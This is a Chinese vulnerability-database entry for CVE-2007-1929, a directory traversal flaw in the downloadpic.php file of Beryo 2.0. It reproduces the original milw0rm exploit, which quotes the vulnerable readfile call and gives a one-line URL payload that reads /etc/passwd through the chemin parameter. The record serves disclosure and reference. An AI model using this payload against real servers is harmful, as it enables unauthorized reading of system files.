Xrousse Beryo 'downloadpic.php' 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112644 漏洞类型 路径遍历
发布时间 2007-04-06 更新时间 2009-04-03
CVE编号 CVE-2007-1929 CNNVD-ID CNNVD-200704-131
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3676
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-131
|漏洞详情
Beryo的downloadpic.php中存在目录遍历漏洞。远程攻击者可以借助chemin参数中的..,读取任意文件。
|漏洞EXP
# Beryo 2.0(downloadpic.php chemin)Remote File Disclosure Vulnerability
# D.Script: http://www.xrousse.org/shared/beryo-2.0.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code: readfile("$chemin");
# Exploit:[Path_Beryo]/downloadpic.php?chemin=../../../../../../etc/passwd

# milw0rm.com [2007-04-06]
|参考资料

来源:XF
名称:beryo-downloadpic-directory-traversal(33479)
链接:http://xforce.iss.net/xforce/xfdb/33479
来源:BID
名称:23387
链接:http://www.securityfocus.com/bid/23387
来源:MILW0RM
名称:3676
链接:http://www.milw0rm.com/exploits/3676
来源:VUPEN
名称:ADV-2007-1296
链接:http://www.frsirt.com/english/advisories/2007/1296
来源:SECUNIA
名称:24811
链接:http://secunia.com/advisories/24811
来源:OSVDB
名称:34778
链接:http://osvdb.org/34778